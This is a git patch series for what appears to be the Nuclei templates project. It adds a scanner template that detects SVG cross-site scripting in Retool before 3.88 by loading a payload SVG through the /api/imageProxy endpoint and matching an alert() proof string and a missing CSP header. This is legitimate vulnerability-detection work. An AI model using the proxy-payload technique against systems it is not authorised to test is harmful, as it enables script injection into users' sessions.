From eb8e32c9393677006c2ea916f2e3010c2bd8e03f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 3 Oct 2024 18:33:39 +0530 Subject: [PATCH 1/3] Create retool-xss.svg --- helpers/payloads/retool-xss.svg | 8 ++++++++ 1 file changed, 8 insertions(+) create mode 100644 helpers/payloads/retool-xss.svg diff --git a/helpers/payloads/retool-xss.svg b/helpers/payloads/retool-xss.svg new file mode 100644 index 0000000000..de449b2d48 --- /dev/null +++ b/helpers/payloads/retool-xss.svg @@ -0,0 +1,8 @@ + + + + + + From 7e42e2df925b59b801362abd2c9cc94152b91a7d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 3 Oct 2024 18:53:43 +0530 Subject: [PATCH 2/3] Create retool-xss.yaml --- http/vulnerabilities/retool/retool-xss.yaml | 41 +++++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 http/vulnerabilities/retool/retool-xss.yaml diff --git a/http/vulnerabilities/retool/retool-xss.yaml b/http/vulnerabilities/retool/retool-xss.yaml new file mode 100644 index 0000000000..982e75ea24 --- /dev/null +++ b/http/vulnerabilities/retool/retool-xss.yaml @@ -0,0 +1,41 @@ +id: retool-xss + +info: + name: Retool 3.88 < - SVG XSS + author: iamnoooob,iamnoooob,pdresearch + severity: high + description: | + This template checks for XSS vulnerability via the Image Proxy URL parameter. + reference: + - https://docs.retool.com/releases/edge/3.88#:~:text=Fixed%20an%20SVG%20XSS%20vulnerability%20by%20adding%20a%20CSP.%20(%2349381) + metadata: + verified: true + max-request: 1 + fofa-query: body="x-retool" + tags: retool,xss + +http: + - raw: + - | + GET /api/imageProxy?url=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/eb8e32c9393677006c2ea916f2e3010c2bd8e03f/helpers/payloads/retool-xss.svg HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "alert('document.domain');" + - "' + condition: and + + - type: word + part: header + negative: true + words: + - "Content-Security-Policy: default-src 'none';" + + - type: status + status: + - 200 From 1e08dead3a7ac35c9ad31ee7c7369daba62cbe93 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 5 Oct 2024 13:33:56 +0400 Subject: [PATCH 3/3] Update and rename retool-xss.yaml to retool-svg-xss.yaml --- .../retool/{retool-xss.yaml => retool-svg-xss.yaml} | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) rename http/vulnerabilities/retool/{retool-xss.yaml => retool-svg-xss.yaml} (84%) diff --git a/http/vulnerabilities/retool/retool-xss.yaml b/http/vulnerabilities/retool/retool-svg-xss.yaml similarity index 84% rename from http/vulnerabilities/retool/retool-xss.yaml rename to http/vulnerabilities/retool/retool-svg-xss.yaml index 982e75ea24..ed1b0cda6c 100644 --- a/http/vulnerabilities/retool/retool-xss.yaml +++ b/http/vulnerabilities/retool/retool-svg-xss.yaml @@ -1,11 +1,11 @@ -id: retool-xss +id: retool-svg-xss info: - name: Retool 3.88 < - SVG XSS + name: Retool < 3.88 - SVG Cross-Site Scripting author: iamnoooob,iamnoooob,pdresearch severity: high description: | - This template checks for XSS vulnerability via the Image Proxy URL parameter. + This template checks for SVG Cross-Site Scripting(XSS) vulnerability via the Image Proxy URL parameter in Retool. reference: - https://docs.retool.com/releases/edge/3.88#:~:text=Fixed%20an%20SVG%20XSS%20vulnerability%20by%20adding%20a%20CSP.%20(%2349381) metadata: @@ -32,9 +32,9 @@ http: - type: word part: header - negative: true words: - "Content-Security-Policy: default-src 'none';" + negative: true - type: status status: